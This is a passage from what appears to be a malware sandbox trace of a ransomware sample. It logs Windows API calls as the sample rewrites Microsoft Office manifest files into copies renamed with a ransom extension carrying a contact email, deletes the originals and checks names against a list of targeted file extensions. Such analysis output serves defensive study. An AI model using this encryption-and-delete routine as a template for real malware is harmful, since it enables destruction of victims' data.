[0206.110] SetEndOfFile (hFile=0x3ec) returned 1 [0206.110] CloseHandle (hObject=0x3ec) returned 1 [0206.118] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.118] SetEndOfFile (hFile=0x3b8) returned 1 [0206.129] CloseHandle (hObject=0x3b8) returned 1 [0206.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0206.133] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml")) returned 1 [0206.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.134] lstrlenW (lpString=".doc") returned 4 [0206.134] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.134] lstrlenW (lpString=".docx") returned 5 [0206.134] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.134] lstrlenW (lpString=".pdf") returned 4 [0206.134] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.134] lstrlenW (lpString=".xls") returned 4 [0206.134] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.134] lstrlenW (lpString=".xlsx") returned 5 [0206.134] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.134] lstrlenW (lpString=".ppt") returned 4 [0206.134] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.134] lstrlenW (lpString=".zip") returned 4 [0206.134] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.134] lstrlenW (lpString=".rar") returned 4 [0206.134] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.134] lstrlenW (lpString=".bz2") returned 4 [0206.134] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.134] lstrlenW (lpString=".7z") returned 3 [0206.134] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.134] lstrlenW (lpString=".dbf") returned 4 [0206.134] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.134] lstrlenW (lpString=".1cd") returned 4 [0206.134] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.134] lstrlenW (lpString=".jpg") returned 4 [0206.135] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.135] lstrlenW (lpString=".doc") returned 4 [0206.135] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.135] lstrlenW (lpString=".docx") returned 5 [0206.135] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.135] lstrlenW (lpString=".pdf") returned 4 [0206.135] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.135] lstrlenW (lpString=".xls") returned 4 [0206.135] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.135] lstrlenW (lpString=".xlsx") returned 5 [0206.135] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.135] lstrlenW (lpString=".ppt") returned 4 [0206.135] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.135] lstrlenW (lpString=".zip") returned 4 [0206.135] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.135] lstrlenW (lpString=".rar") returned 4 [0206.135] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.135] lstrlenW (lpString=".bz2") returned 4 [0206.135] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.135] lstrlenW (lpString=".7z") returned 3 [0206.135] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.135] lstrlenW (lpString=".dbf") returned 4 [0206.135] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.136] lstrlenW (lpString=".1cd") returned 4 [0206.136] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0206.136] lstrlenW (lpString=".jpg") returned 4 [0206.136] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.136] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0206.136] lstrlenW (lpString="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 53 [0206.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0206.136] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1261) returned 1 [0206.136] CloseHandle (hObject=0x3b8) returned 1 [0206.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml")) returned 0x220 [0206.137] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0206.137] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.137] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0206.137] GetLastError () returned 0x0 [0206.137] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0206.333] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0207.064] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.065] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0207.065] SetEndOfFile (hFile=0x3ec) returned 1 [0207.065] CloseHandle (hObject=0x3ec) returned 1 [0207.115] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.115] SetEndOfFile (hFile=0x3b8) returned 1 [0207.115] CloseHandle (hObject=0x3b8) returned 1 [0207.115] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.116] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml")) returned 1 [0207.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.116] lstrlenW (lpString=".doc") returned 4 [0207.116] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.116] lstrlenW (lpString=".docx") returned 5 [0207.116] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.116] lstrlenW (lpString=".pdf") returned 4 [0207.116] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.116] lstrlenW (lpString=".xls") returned 4 [0207.116] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.116] lstrlenW (lpString=".xlsx") returned 5 [0207.116] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.116] lstrlenW (lpString=".ppt") returned 4 [0207.117] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.117] lstrlenW (lpString=".zip") returned 4 [0207.117] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.117] lstrlenW (lpString=".rar") returned 4 [0207.117] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.117] lstrlenW (lpString=".bz2") returned 4 [0207.117] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.117] lstrlenW (lpString=".7z") returned 3 [0207.117] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.117] lstrlenW (lpString=".dbf") returned 4 [0207.117] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.117] lstrlenW (lpString=".1cd") returned 4 [0207.117] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.117] lstrlenW (lpString=".jpg") returned 4 [0207.117] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.117] lstrlenW (lpString=".doc") returned 4 [0207.117] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.117] lstrlenW (lpString=".docx") returned 5 [0207.117] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.117] lstrlenW (lpString=".pdf") returned 4 [0207.117] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.117] lstrlenW (lpString=".xls") returned 4 [0207.117] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.118] lstrlenW (lpString=".xlsx") returned 5 [0207.118] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.118] lstrlenW (lpString=".ppt") returned 4 [0207.118] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.118] lstrlenW (lpString=".zip") returned 4 [0207.118] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.118] lstrlenW (lpString=".rar") returned 4 [0207.118] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.118] lstrlenW (lpString=".bz2") returned 4 [0207.118] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.118] lstrlenW (lpString=".7z") returned 3 [0207.118] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.118] lstrlenW (lpString=".dbf") returned 4 [0207.118] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.118] lstrlenW (lpString=".1cd") returned 4 [0207.118] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0207.118] lstrlenW (lpString=".jpg") returned 4 [0207.118] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.118] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0207.118] lstrlenW (lpString="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 53 [0207.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0207.119] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1261) returned 1 [0207.119] CloseHandle (hObject=0x3b8) returned 1 [0207.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml")) returned 0x220 [0207.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0207.119] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.119] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0207.119] GetLastError () returned 0x0 [0207.119] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0207.265] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0207.266] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.266] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0207.266] SetEndOfFile (hFile=0x418) returned 1 [0207.266] CloseHandle (hObject=0x418) returned 1 [0207.269] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.269] SetEndOfFile (hFile=0x3b8) returned 1 [0207.271] CloseHandle (hObject=0x3b8) returned 1 [0207.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.271] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml")) returned 1 [0207.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.271] lstrlenW (lpString=".doc") returned 4 [0207.272] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.272] lstrlenW (lpString=".docx") returned 5 [0207.272] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.272] lstrlenW (lpString=".pdf") returned 4 [0207.272] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.272] lstrlenW (lpString=".xls") returned 4 [0207.272] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.272] lstrlenW (lpString=".xlsx") returned 5 [0207.272] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.272] lstrlenW (lpString=".ppt") returned 4 [0207.272] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.272] lstrlenW (lpString=".zip") returned 4 [0207.272] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.272] lstrlenW (lpString=".rar") returned 4 [0207.272] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.272] lstrlenW (lpString=".bz2") returned 4 [0207.272] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.272] lstrlenW (lpString=".7z") returned 3 [0207.272] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.272] lstrlenW (lpString=".dbf") returned 4 [0207.272] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.272] lstrlenW (lpString=".1cd") returned 4 [0207.272] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.273] lstrlenW (lpString=".jpg") returned 4 [0207.273] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.273] lstrlenW (lpString=".doc") returned 4 [0207.273] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.273] lstrlenW (lpString=".docx") returned 5 [0207.273] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.273] lstrlenW (lpString=".pdf") returned 4 [0207.273] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.273] lstrlenW (lpString=".xls") returned 4 [0207.273] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.273] lstrlenW (lpString=".xlsx") returned 5 [0207.273] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.273] lstrlenW (lpString=".ppt") returned 4 [0207.273] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.273] lstrlenW (lpString=".zip") returned 4 [0207.273] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.273] lstrlenW (lpString=".rar") returned 4 [0207.273] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.273] lstrlenW (lpString=".bz2") returned 4 [0207.273] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.273] lstrlenW (lpString=".7z") returned 3 [0207.273] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.274] lstrlenW (lpString=".dbf") returned 4 [0207.274] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.274] lstrlenW (lpString=".1cd") returned 4 [0207.274] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0207.274] lstrlenW (lpString=".jpg") returned 4 [0207.274] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.274] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0207.274] lstrlenW (lpString="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 53 [0207.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0207.275] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=3375) returned 1 [0207.275] CloseHandle (hObject=0x3b8) returned 1 [0207.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml")) returned 0x220 [0207.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0207.275] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.275] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: 